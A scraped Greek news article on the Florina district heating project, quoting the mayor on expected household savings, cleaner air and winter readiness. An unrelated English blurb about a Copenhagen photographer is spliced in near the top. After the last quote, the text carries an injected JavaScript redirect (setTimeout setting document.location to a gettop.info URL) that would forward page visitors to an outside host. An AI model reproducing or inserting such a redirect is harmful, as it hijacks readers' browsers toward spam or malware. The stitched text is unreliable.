Μέχρι το τέλος του 2018 αναμένεται να ολοκληρωθεί η τηλεθέρμανση στη Φλώρινα

0
11
Copenhagen based photographer Thomas Rousing, captures the beauty of everyday life in the city and objects found on his way through it. He seeks to explore the interestingness of making images filled with endless views and brilliant colours

 

Έως το τέλος του 2018 αναμένεται, σύμφωνα με το ισχύον χρονοδιάγραμμα, να ολοκληρωθεί το έργο της τηλεθέρμανσης στη Φλώρινα, το οποίο θα προσφέρει φθηνότερη θέρμανση σε περίπου 16.000 κατοίκους σε όλη την πόλη.

Σύμφωνα με τον δήμαρχο Φλώρινας, Γιάννη Βοσκόπουλο, αυτό το διάστημα τέσσερα συνεργεία τοποθετούν τους κεντρικούς αγωγούς τηλεθέρμανσης, μήκους περίπου 16 χιλιομέτρων, που θα μεταφέρουν το υπέρθερμο νερό από τη Μελίτη στην πόλη της Φλώρινας.

Να τελειώσει σύντομα το έργο της τηλεθέρμανσης γιατί θα επωφεληθούμε πάρα πολύ. Ένα νοικοκυριό που σήμερα ξοδεύει 3.500 έως 4.000 ευρώ για να θερμάνει το σπίτι το χειμώνα, αναμένεται με 600 ευρώ να έχει θέρμανση καθόλη τη διάρκεια του έτους. Θα γίνουν 2.000 συνδέσεις και θα επωφεληθούν περίπου 16.000 άτομα”, δήλωσε στο ΑΠΕ – ΜΠΕ ο κ.Βοσκόπουλος.

Ωστόσο, πέρα από οικονομικά οφέλη θα υπάρξουν και περιβαλλοντικά με τον δήμαρχο να υποστηρίζει πως “το χειμώνα αρκετοί καίνε ξυλόσομπες, κάρβουνα και πετρέλαια, με αποτέλεσμα να δημιουργούνται μικροσωματίδια στην ατμόσφαιρα. Με την τηλεθέρμανση θα αναπνέουμε πιο καθαρό αέρα”.

Όπως ανέφερε ο κ.Βοσκόπουλος, εδώ και περίπου δύο εβδομάδες οι κάτοικοι της Φλώρινας έχουν αρχίσει να ανάβουν τα καλοριφέρ στα σπίτια τους, καθώς τις βραδινές ώρες η θερμοκρασία πέφτει κάτω από τους 10 βαθμούς Κελσίου, ενώ η δημοτική αρχή είναι πανέτοιμη στην περίπτωση του χιονιά, που προβλέπουν οι μετεωρολόγοι.

Είμαστε πανέτοιμοι, έχουμε προμηθευτεί το αλάτι που είναι απαραίτητο να ρίξουμε στους δρόμους για παγετό, ενώ και τα σχολεία είναι πανέτοιμα. Έχουμε προετοιμαστεί να υποδεχτούμε τον χειμώνα”,πρόσθεσε ο δήμαρχος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here